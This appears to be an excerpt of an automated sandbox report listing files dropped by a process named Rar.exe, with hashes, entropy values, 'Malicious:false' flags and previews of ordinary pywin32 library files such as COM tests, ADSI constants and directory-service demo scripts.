                                                                                                                                                                                                                                  SHA1:1E0FB80CF40EB687053E12A00DC74DFA56808795
                                                                                                                                                                                                                                  SHA-256:108114E128DE165DB1C520EB2EC758838F8F8AF58F723DC0597B93DD95EBA741
                                                                                                                                                                                                                                  SHA-512:DD442D7357F814D3D762608464E752C9493758E2BA5AEB8E41A0E6B80FAF4C56A5CAFD531C7EF8794BDC8C02281E5BBC5E765A5D803D892A55265B60E3A6F1E0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import win32com.test.util.from win32com.client.dynamic import DumbDispatch.from win32com.client.gencache import EnsureDispatch...class RegexTest(win32com.test.util.TestCase):. def _CheckMatches(self, match, expected):. found = []. for imatch in match:. found.append(imatch.FirstIndex). self.assertEqual(list(found), list(expected)).. def _TestVBScriptRegex(self, re):. StringToSearch = "Python python pYthon Python". re.Pattern = "Python". re.Global = True.. re.IgnoreCase = True. match = re.Execute(StringToSearch). expected = 0, 7, 14, 21. self._CheckMatches(match, expected).. re.IgnoreCase = False. match = re.Execute(StringToSearch). expected = 0, 21. self._CheckMatches(match, expected).. def testDynamic(self):. re = DumbDispatch("VBScript.Regexp"). self._TestVBScriptRegex(re).. def testGenerated(self):. re = EnsureDispatch("VBScrip
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):569
                                                                                                                                                                                                                                  Entropy (8bit):4.996906879670943
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:aqg5AGVGQTA+ejRRB3cxEAGV87oNRRB1qkOA0gmLMBejLl7mW+QR3C:aT5AGIQ8P3hcxEAGR3PqkN0gmQcVhjRy
                                                                                                                                                                                                                                  MD5:D554BE734CB85844B11399768011CCE4
                                                                                                                                                                                                                                  SHA1:ED8AFBCD33369D5639D3C0BC32B7ABC6BDBDC85F
                                                                                                                                                                                                                                  SHA-256:75F0426A7CBE91D5556170F93A69A07FB1657790CE5615AAEE894CE17A39EF11
                                                                                                                                                                                                                                  SHA-512:9F59DEED36D9C36B68FA33A25C66A5BC8AA937DA1CDD41D5106B8072BE56F1C082162603BA260E2948A2C4D630D7219BF733FD3D841527578B0CD4CEF5775620
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview://Args: input-file style-file output-file.var xml = WScript.CreateObject("Microsoft.XMLDOM"); //input.xml.validateOnParse=false;.xml.load(WScript.Arguments(0));.var xsl = WScript.CreateObject("Microsoft.XMLDOM"); //style.xsl.validateOnParse=false;.xsl.load(WScript.Arguments(1));.var out = WScript.CreateObject("Scripting.FileSystemObject"); //output.var replace = true; var unicode = false; //output file properties.var hdl = out.CreateTextFile( WScript.Arguments(2), replace, unicode ).hdl.write( xml.transformNode( xsl.documentElement ));.//eof.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):921
                                                                                                                                                                                                                                  Entropy (8bit):4.210786222625114
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:0gchw3F9GRa+eRtyRdgkLgrYrmYJbn2xpVS:Ghw3LGrenC/dVJb2xfS
                                                                                                                                                                                                                                  MD5:C7D703290904AF62F8A614D2F10E5403
                                                                                                                                                                                                                                  SHA1:2C9FD5E5AFBD6906B98689D16C7A006A4599DF85
                                                                                                                                                                                                                                  SHA-256:8AF9A3943E86626C6D6CC91C11594B12A3C02A82764171F0C064991D82A27ACB
                                                                                                                                                                                                                                  SHA-512:7880BEA13CB219E5EB04E5ABA8D4462817FA37C77E47931FA90E76305138B167ADC2EAD920B5C655FB76D0E07ADC34AD38AE02355D41275D2A5E6B99AB315621
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os.import tempfile.import unittest..import win32com.test.util..expected_output = "The jscript test worked.\nThe Python test worked"...class XSLT(win32com.test.util.TestCase):. def testAll(self):. output_name = tempfile.mktemp("-pycom-test"). cmd = (. "cscript //nologo testxslt.js doesnt_matter.xml testxslt.xsl " + output_name. ). win32com.test.util.ExecuteShellCommand(cmd, self). try:. f = open(output_name). try:. got = f.read(). if got != expected_output:. print("ERROR: XSLT expected output of %r" % (expected_output,)). print("but got %r" % (got,)). finally:. f.close(). finally:. try:. os.unlink(output_name). except os.error:. pass...if __name__ == "__main__":. unittest.main().
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2058
                                                                                                                                                                                                                                  Entropy (8bit):4.628887308709545
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+aHUa1HXIULa1dhchWMfQHPV3M3Ll7vvIT91wlLv:+f0HX1QGJfQHPdULJvATvwlb
                                                                                                                                                                                                                                  MD5:3AB554D42090171E1253172269EA23CC
                                                                                                                                                                                                                                  SHA1:B0999CC2465E29972BA22D62B99D5F7F57AB692A
                                                                                                                                                                                                                                  SHA-256:EBEAC1C9122414E43557AF079F4341A73A7A5B0E5C87AB85BD82430BD8CB8D81
                                                                                                                                                                                                                                  SHA-512:B356E2C9E370A18296F81E91DCA2F698B1BDDA6A046BEC911B7C0746F5EC16D5032A0BED169BB439F87A0C94543DE0E9FA484B7D4E1297B06CD3C5620FFEFFCF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview: include in the xsl:stylesheet element:. (a) the version attribute as usual. (b) the XSLT namespace declaration as usual. (c) the MSXSL namespace declaration. (d) a namespace declaration to identify your functions. (e) the 'extension-element-prefixes' attribute to give the. namespace prefixes that indicate extension elements. (i.e. 'msxsl'). (f) the 'exclude-result-prefixes' attribute to indicate the. namespaces that aren't supposed to be part of the result. tree (i.e. 'foo') -->.<xsl:stylesheet version="1.0". xmlns:xsl="http://www.w3.org/1999/XSL/Transform". xmlns:msxsl="urn:schemas-microsoft-com:xslt". xmlns:foo="http://www.pythoncom-test.com/foo". xmlns:bar="http://www.pythoncom-test.com/bar". extension-element-prefixes="msxsl". exclude-result-prefixes="foo bar">.. do whatever output you want - you can use full XSLT functionality.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8175
                                                                                                                                                                                                                                  Entropy (8bit):4.552793670747682
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:6HDNB3kwqLuPs+hQVYgNxFcFqgM1k4JMzQKoJ5mdjqmS:6HDNkL42xcx4JMzQKoHr
                                                                                                                                                                                                                                  MD5:EB32AD5A4CB98B7A2F49BA7DBBFD7057
                                                                                                                                                                                                                                  SHA1:382F050294B787A9D82DB6F05B24EFE601D4ABAC
                                                                                                                                                                                                                                  SHA-256:AE3F40AAE239A49FCF2C8D3E992C934BE17203FA04EE389B83C07B1BAC7BB324
                                                                                                                                                                                                                                  SHA-512:F19D14CC099DBD4F981B20FA71083608443769A6F6050FD3D42A12FF3A0923045509A16314B6C771B9CAAA8A34AF2BB8217F7C789BE3246862285187F32D9354
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import gc.import logging.import os.import sys.import tempfile.import unittest.import winreg..import pythoncom.import pywin32_testutil.import pywintypes.import win32api.import win32com.import winerror.from pythoncom import _GetGatewayCount, _GetInterfaceCount.from pywin32_testutil import LeakTestCase, TestLoader, TestResult, TestRunner...def CheckClean():. # Ensure no lingering exceptions - Python should have zero outstanding. # COM objects. try:. sys.exc_clear(). except AttributeError:. pass # py3k. c = _GetInterfaceCount(). if c:. print("Warning - %d com interface objects still alive" % c). c = _GetGatewayCount(). if c:. print("Warning - %d com gateway objects still alive" % c)...def RegisterPythonServer(filename, progids=None, verbose=0):. if progids:. if isinstance(progids, str):. progids = [progids]. # we know the CLSIDs we need, but we might not be an admin user. # and otherwise unable to regis
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8532
                                                                                                                                                                                                                                  Entropy (8bit):4.453702334139223
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:bqbZeElBn+fSCWT3kXo/rE6yZDbOKbKafMyDyX7:2ZeElBn+fSLQtDbRbIX7
                                                                                                                                                                                                                                  MD5:3FEC573C1329017514AE59E602836AB4
                                                                                                                                                                                                                                  SHA1:9D09532F0CD562EBCD1498249F290DA5C85BDA42
                                                                                                                                                                                                                                  SHA-256:97FBDE1DC49AEFC1239740553A8A07D0F74AE2A1A8060C54DACD018347DFAD9F
                                                                                                                                                                                                                                  SHA-512:CDE5918557A219A73C4750FE3285256F7B27087D28EC4F782BB3155A55DD53B9DC2EA31A4D079499C1FF29C46C59733862C18B7A5CDB227B9AB7185B274E9A1F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Code that packs and unpacks the Univgw structures...# See if we have a special directory for the binaries (for developers)..import pythoncom.from win32com.client import gencache..com_error = pythoncom.com_error._univgw = pythoncom._univgw...def RegisterInterfaces(typelibGUID, lcid, major, minor, interface_names=None):. ret = [] # return a list of (dispid, funcname for our policy's benefit. # First see if we have makepy support. If so, we can probably satisfy the request without loading the typelib.. try:. mod = gencache.GetModuleForTypelib(typelibGUID, lcid, major, minor). except ImportError:. mod = None. if mod is None:. import win32com.client.build.. # Load up the typelib and build (but don't cache) it now. tlb = pythoncom.LoadRegTypeLib(typelibGUID, major, minor, lcid). typecomp_lib = tlb.GetTypeComp(). if interface_names is None:. interface_names = []. for i in range(tlb.GetTypeInfoCount()):.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1030
                                                                                                                                                                                                                                  Entropy (8bit):4.44193815730948
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:4XDGwAD64VJZF80WHWQ/g6a6vh1ZMy6cvx16K67nBwa:y50647ZFIHVo6XvtMy6sEnSa
                                                                                                                                                                                                                                  MD5:0234252BED6F281EE2870D5CE30B539C
                                                                                                                                                                                                                                  SHA1:8B9BA395C4CDC7DD2627E91A2A2B93C15E6213FB
                                                                                                                                                                                                                                  SHA-256:EF265A6B2D99D45A776F178B7C495800ED817AE029E3D69C528CE55C16DD838A
                                                                                                                                                                                                                                  SHA-512:27E74951F7310C3A0CD68F0E9D8021CEE503A019AADD13F840C5EB5E59D42C4C992AD12057D8992B82AA72C7CBD79BB6B2618B8F9BDF24528375C20D6C10B4E4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""General utility functions common to client and server... This module contains a collection of general purpose utility functions..""".import pythoncom.import win32api.import win32con...def IIDToInterfaceName(iid):. """Converts an IID to a string interface name... Used primarily for debugging purposes, this allows a cryptic IID to. be converted to a useful string name. This will firstly look for interfaces. known (ie, registered) by pythoncom. If not known, it will look in the. registry for a registered interface... iid -- An IID object... Result -- Always a string - either an interface name, or '<Unregistered interface>'. """. try:. return pythoncom.ServerInterfaces[iid]. except KeyError:. try:. try:. return win32api.RegQueryValue(. win32con.HKEY_CLASSES_ROOT, "Interface\\%s" % iid. ). except win32api.error:. pass. except ImportError:.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3694
                                                                                                                                                                                                                                  Entropy (8bit):4.761000260193915
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:isnKuMMO87ObEgZLR8y6QdRpvuczTQ1zfzREfmNRn:hlMgtAN8y68nQ1zfzREfmNRn
                                                                                                                                                                                                                                  MD5:25CD42B65143EE07806222BB716E209B
                                                                                                                                                                                                                                  SHA1:1BEEC40834774119611C43C5F1F3B70AD0D0240A
                                                                                                                                                                                                                                  SHA-256:5BFC052EE843BA68412A97F351A829A0D0B0CE8EF5655B676986D32F42BA5791
                                                                                                                                                                                                                                  SHA-512:F88709D7D08F654714D91C1D800EF3C576D12D0181E99C756ACB3777AEBFF143F61EB1DF591904DD61C33C6364A16D3950D13818C17AA6A8393690D6A56363F7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32com.import win32com.client..if type(__path__) == type(""):. # For freeze to work!. import sys.. try:. import adsi.. sys.modules["win32com.adsi.adsi"] = adsi. except ImportError:. pass.else:. # See if we have a special directory for the binaries (for developers). win32com.__PackageSupportBuildPath__(__path__)...# Some helpers.# We want to _look_ like the ADSI module, but provide some additional.# helpers...# Of specific note - most of the interfaces supported by ADSI.# derive from IDispatch - thus, you get the custome methods from the.# interface, as well as via IDispatch..import pythoncom..from .adsi import *..LCID = 0..IDispatchType = pythoncom.TypeIIDs[pythoncom.IID_IDispatch].IADsContainerType = pythoncom.TypeIIDs[adsi.IID_IADsContainer]...def _get_good_ret(. ob,. # Named arguments used internally. resultCLSID=None,.):. assert resultCLSID is None, "Now have type info for ADSI objects - fix me!". # See if the object su
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):76800
                                                                                                                                                                                                                                  Entropy (8bit):6.516814809906401
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:sZovc+wbS4qLRNmxLhKE5jy2WqE3RX8YFhz1c4jurq:sCS23RExLhKEMqE3JFhz1c4ju+
                                                                                                                                                                                                                                  MD5:C9D92DEAAD81286033BD8597BD56EBF3
                                                                                                                                                                                                                                  SHA1:F75832F9A318E03F3517C32F3BC739F09DEDD739
                                                                                                                                                                                                                                  SHA-256:0980993B3890D478E79CD122376773979B858429DDFD1372129A6ED5F0CD7849
                                                                                                                                                                                                                                  SHA-512:85EB98D008BE197DAF653189DB5153B06B27C93A96919964125C50ACAB1065D8F9F306D557593D95925C73EC024A97247B13EC5AD2C34223D2AC6853B002C6F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................b.................................a.................J..................Rich..................PE..L...t..d...........!.....................................................................@.............................H...(........P..L....................`......P...T...............................@...............h............................text............................... ..`.rdata..$q.......r..................@..@.data........0......................@....rsrc...L....P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12303
                                                                                                                                                                                                                                  Entropy (8bit):4.812594738230301
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:iesFrX0mFm6k1cfAf/flO590KP5yD4zxNjNMvvAw/3tcEI0SpEE3R1Snb+83Qgwz:yz0+xN+vvxtzSpEoR1OfQthVSfrsKbkd
                                                                                                                                                                                                                                  MD5:97001F17DB58C29F039147B67528F891
                                                                                                                                                                                                                                  SHA1:288383FBC5ED6630BCA5133C61667FEF99F1EF1A
                                                                                                                                                                                                                                  SHA-256:C6D18AE28861CE2A9C24F6F82943DAD9BB22B89CA9E010BDB3A4F987F5A37578
                                                                                                                                                                                                                                  SHA-512:05068DEF956ECE014A66F6FC51C66BE89C882EF1352CD4045A7C4836E5CE833838D9214F46FEA86DC91D506C00D5906B57377EA20C9ADD79D09944941FA5437D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:ADS_ATTR_CLEAR = 1.ADS_ATTR_UPDATE = 2.ADS_ATTR_APPEND = 3.ADS_ATTR_DELETE = 4.ADS_EXT_MINEXTDISPID = 1.ADS_EXT_MAXEXTDISPID = 16777215.ADS_EXT_INITCREDENTIALS = 1.ADS_EXT_INITIALIZE_COMPLETE = 2..ADS_SEARCHPREF_ASYNCHRONOUS = 0.ADS_SEARCHPREF_DEREF_ALIASES = 1.ADS_SEARCHPREF_SIZE_LIMIT = 2.ADS_SEARCHPREF_TIME_LIMIT = 3.ADS_SEARCHPREF_ATTRIBTYPES_ONLY = 4.ADS_SEARCHPREF_SEARCH_SCOPE = 5.ADS_SEARCHPREF_TIMEOUT = 6.ADS_SEARCHPREF_PAGESIZE = 7.ADS_SEARCHPREF_PAGED_TIME_LIMIT = 8.ADS_SEARCHPREF_CHASE_REFERRALS = 9.ADS_SEARCHPREF_SORT_ON = 10.ADS_SEARCHPREF_CACHE_RESULTS = 11.ADS_SEARCHPREF_DIRSYNC = 12.ADS_SEARCHPREF_TOMBSTONE = 13..ADS_SCOPE_BASE = 0.ADS_SCOPE_ONELEVEL = 1.ADS_SCOPE_SUBTREE = 2..ADS_SECURE_AUTHENTICATION = 0x1.ADS_USE_ENCRYPTION = 0x2.ADS_USE_SSL = 0x2.ADS_READONLY_SERVER = 0x4.ADS_PROMPT_CREDENTIALS = 0x8.ADS_NO_AUTHENTICATION = 0x10.ADS_FAST_BIND = 0x20.ADS_USE_SIGNING = 0x40.ADS_USE_SEALING = 0x80.ADS_USE_DELEGATION = 0x100.ADS_SERVER_BIND = 0x200..ADSTYPE_INVALID = 0.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                                                  Entropy (8bit):4.948611303861004
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:lHV2cCUG5d+jiWi2ctQuAlyFLLvBYwjm1baGooFHgpzZCWx/i:NctWit9A8xL5Ymm1baGooFApzpx/i
                                                                                                                                                                                                                                  MD5:BA0DAB35B6DCC0D124666CE5FB9EAEDB
                                                                                                                                                                                                                                  SHA1:DCE97AE0A508BA8D502D2D90B71FFB893EDAE84D
                                                                                                                                                                                                                                  SHA-256:E11BA5576094FBA15DDB5BE66E4E72FDA7E7F460593E8B815E026D2356B769D1
                                                                                                                                                                                                                                  SHA-512:D17C59AAD49807C15FC10ACE6D0BD4576F00A3041AD3DC394A7BA0D9425C22F4F3D5C6FAD45D59869A2A1AE20FE23EA7478EE28BCB8A7F717C8EFCCF18397AB9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A demo for the IDsObjectPicker interface..import pythoncom.import win32clipboard.from win32com.adsi import adsi.from win32com.adsi.adsicon import *..cf_objectpicker = win32clipboard.RegisterClipboardFormat(CFSTR_DSOP_DS_SELECTION_LIST)...def main():. hwnd = 0.. # Create an instance of the object picker.. picker = pythoncom.CoCreateInstance(. adsi.CLSID_DsObjectPicker,. None,. pythoncom.CLSCTX_INPROC_SERVER,. adsi.IID_IDsObjectPicker,. ).. # Create our scope init info.. siis = adsi.DSOP_SCOPE_INIT_INFOs(1). sii = siis[0].. # Combine multiple scope types in a single array entry... sii.type = (. DSOP_SCOPE_TYPE_UPLEVEL_JOINED_DOMAIN | DSOP_SCOPE_TYPE_DOWNLEVEL_JOINED_DOMAIN. ).. # Set uplevel and downlevel filters to include only computer objects.. # Uplevel filters apply to both mixed and native modes.. # Notice that the uplevel and downlevel flags are different... sii.filterFlags.uplevel.bothModes = DSOP_FILT
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19144
                                                                                                                                                                                                                                  Entropy (8bit):4.771290812448383
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:M3xkN3KcPgMB40g4JTuLUpLW/YFimhMVo62AATeE7XgtgN24gtWcPxIo2ZuAjryT:A58JuiWQUUchJG/Wj
                                                                                                                                                                                                                                  MD5:6AF72C80B4C12C5A64FAFB54D7814177
                                                                                                                                                                                                                                  SHA1:BC3E8C14C8E2EA8DD102397F0FFE375CCC27AC09
                                                                                                                                                                                                                                  SHA-256:2C8BF8FBF796F30D2838EE52D0E0EADBF54775A9B9D7EB1C616771A36D7234CF
                                                                                                                                                                                                                                  SHA-512:A5EE5B81F5A8216C4786C304457CD51116FB224164F9E5739B21D1BBAE842E9645A92255131F8C8221E1BDFC598BACB3F005D64D93A685D69AA931DFA7C18727
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A re-implementation of the MS DirectoryService samples related to services...* Adds and removes an ActiveDirectory "Service Connection Point",. including managing the security on the object..* Creates and registers Service Principal Names..* Changes the username for a domain user...Some of these functions are likely to become move to a module - but there.is also a little command-line-interface to try these functions out...For example:..scp.py --account-name=domain\\user --service-class=PythonScpTest \\. --keyword=foo --keyword=bar --binding-string=bind_info \\. ScpCreate SpnCreate SpnRegister..would:.* Attempt to delete a Service Connection Point for the service class. 'PythonScpTest'.* Attempt to create a Service Connection Point for that class, with 2. keywords and a binding string of 'bind_info'.* Create a Service Principal Name for the service and register it..to undo those changes, you could execute:..scp.py --account-name=domain\\user --service-class=PythonScpTe
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4169
                                                                                                                                                                                                                                  Entropy (8bit):4.6496957953422235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:iQ+oR4VOObthLZvkAdtPDQlnNqJ1Xmx8HsiZEpSSFMdi:LOpxZptLQVIbXmx8MqEwjdi
                                                                                                                                                                                                                                  MD5:0A534E0FB32C632B948483B81C492BE5
                                                                                                                                                                                                                                  SHA1:315A8ED1A99D57A2E85105517AC8BBD156770FEF
                                                                                                                                                                                                                                  SHA-256:FF926B3BFA8FD17CD1CD4C1D746563FE2F9606422ADEDDA5A0C532997CBDE52E
                                                                                                                                                                                                                                  SHA-512:51488B474A677C6C8BA2EE32E10EF7379CDBFDF22A1CF0D6B775BDDC700427E63F7D2BD8C700FE5E76D9265494296506A8ED6AB5F15926924A72ED91CBB692A2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import pythoncom.import pywintypes.import win32security.from win32com.adsi import adsi, adsicon.from win32com.adsi.adsicon import *..options = None # set to optparse options object..ADsTypeNameMap = {}...def getADsTypeName(type_val):. # convert integer type to the 'typename' as known in the headerfiles.. if not ADsTypeNameMap:. for n, v in adsicon.__dict__.items():. if n.startswith("ADSTYPE_"):. ADsTypeNameMap[v] = n. return ADsTypeNameMap.get(type_val, hex(type_val))...def _guid_from_buffer(b):. return pywintypes.IID(b, True)...def _sid_from_buffer(b):. return str(pywintypes.SID(b))..._null_converter = lambda x: x..converters = {. "objectGUID": _guid_from_buffer,. "objectSid": _sid_from_buffer,. "instanceType": getADsTypeName,.}...def log(level, msg, *args):. if options.verbose >= level:. print("log:", msg % args)...def getGC():. cont = adsi.ADsOpenObject(. "GC:", options.user, options.password, 0, adsi.IID_
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8519
                                                                                                                                                                                                                                  Entropy (8bit):4.629808468909972
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:UtRHlgIr4Rg1NaRKOy64zBwi0cbUkxDisp3sLlZC/fxli:UfFy+igB6uxDisp3sLl1
                                                                                                                                                                                                                                  MD5:88F8118FB6975331D4D6B4540171B3D0
                                                                                                                                                                                                                                  SHA1:4C2FACEDDA8B6C4BF85EB7ABF1806B9DF06B7994
                                                                                                                                                                                                                                  SHA-256:D520BCC60691001EF5ED60FB13481FCDD8C291C061DE4A2F5FBE432AC30D57F5
                                                                                                                                                                                                                                  SHA-512:7C5E405F3C3372363F5E19AA9C2AADD4C190A1738A6D212522F722D64FDE04F4520169B09C2734DD45D89897F9AA0881BBF26B8C562B0FD173E20E95645BB9F1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import string.import sys..import pythoncom.import win32api.from win32com.adsi import *..verbose_level = 0..server = "" # Must have trailing /.local_name = win32api.GetComputerName()...def DumpRoot():. "Dumps the root DSE". path = "LDAP://%srootDSE" % server. rootdse = ADsGetObject(path).. for item in rootdse.Get("SupportedLDAPVersion"):. print("%s supports ldap version %s" % (path, item)).. attributes = ["CurrentTime", "defaultNamingContext"]. for attr in attributes:. val = rootdse.Get(attr). print(" %s=%s" % (attr, val))...###############################################.#.# Code taken from article titled:.# Reading attributeSchema and classSchema Objects.def _DumpClass(child):. attrs = "Abstract lDAPDisplayName schemaIDGUID schemaNamingContext attributeSyntax oMSyntax". _DumpTheseAttributes(child, string.split(attrs))...def _DumpAttribute(child):. attrs = "lDAPDisplayName schemaIDGUID adminDescription adminDisplayName rDNAttID defaultHi
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):192
                                                                                                                                                                                                                                  Entropy (8bit):4.73288878491099
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SbFVEbW2llQkEr66FuxAAyWX7myhAgMXFPJoFcAtUIVKzLHKFaWlQkEr66NRS66u:SbFubDlQkDAAyWrNhS5WmKVsLHKkWlQp
                                                                                                                                                                                                                                  MD5:3D90A8BDF51DE0D7FAE66FC1389E2B45
                                                                                                                                                                                                                                  SHA1:B1D30B405F4F6FCE37727C9EC19590B42DE172EE
                                                                                                                                                                                                                                  SHA-256:7D1A6FE54DC90C23B0F60A0F0B3F9D5CAE9AC1AFECB9D6578F75B501CDE59508
                                                                                                                                                                                                                                  SHA-512:BD4EA236807A3C128C1EC228A19F75A0A6EF2B29603C571EE5D578847B20B395FEC219855D66A409B5057B5612E924EDCD5983986BEF531F1309ABA2FE7F0636
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is a python package.# __PackageSupportBuildPath__ not needed for distutil based builds,.# but not everyone is there yet..import win32com..win32com.__PackageSupportBuildPath__(__path__).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23040
                                                                                                                                                                                                                                  Entropy (8bit):6.062839817250289
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:arzdKQVZXqBDe+6G7DDfwhHwz4yYBUjjgPpYE4ggd1CpNL1u6To:EUIhHwz4yY1PpAZCpNL1u6To
                                                                                                                                                                                                                                  MD5:E3ED8D5742C06BBA31DB1AFF1F2A33F7
                                                                                                                                                                                                                                  SHA1:6D1A2C685FE349CDB53A61A22C06822FAE8BE07B
                                                                                                                                                                                                                                  SHA-256:011707B089AB8E55FAC97E4E56A479E2890B1D8DD6072DA2E7D6F14D69031010
                                                                                                                                                                                                                                  SHA-512:3355D837EC006425C8848BE39108EC1C0641C0E36B319D57712251A3CD22F98D334584FE5AFC9882298BCEBCCDE544202E86E2F69950E58E45F03AF89FC18401
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y..............`*......m.......m.......m.......m......Am......'q.......s..............Am......Am......Am......Rich....................PE..L......d...........!.....*...,.......'.......@............................................@.........................`P..\....P.......p..l........................... E..T...........................xE..@............@...............................text....).......*.................. ..`.rdata.......@... ..................@..@.data...h....`.......N..............@....rsrc...l....p.......P..............@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9011
                                                                                                                                                                                                                                  Entropy (8bit):4.719971542686045
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:lxNw/DfCnB+J7V2zOEuIzmn24P5z/TLmn6cEIyPCuTrcayxcjF2VcXozGkUbz:lxN2CIX2zxgPLcNmFfNyxp5G3
                                                                                                                                                                                                                                  MD5:03BA827D3BA1E38C61E394FE909CE800
                                                                                                                                                                                                                                  SHA1:90BCFD2FF3CDFBFF6D51233101CA79ED05D5BCD4
                                                                                                                                                                                                                                  SHA-256:992E18C3D88C678B5BE0B2E2F84EFD3B096B47DE672508E711B6EE3DA884A807
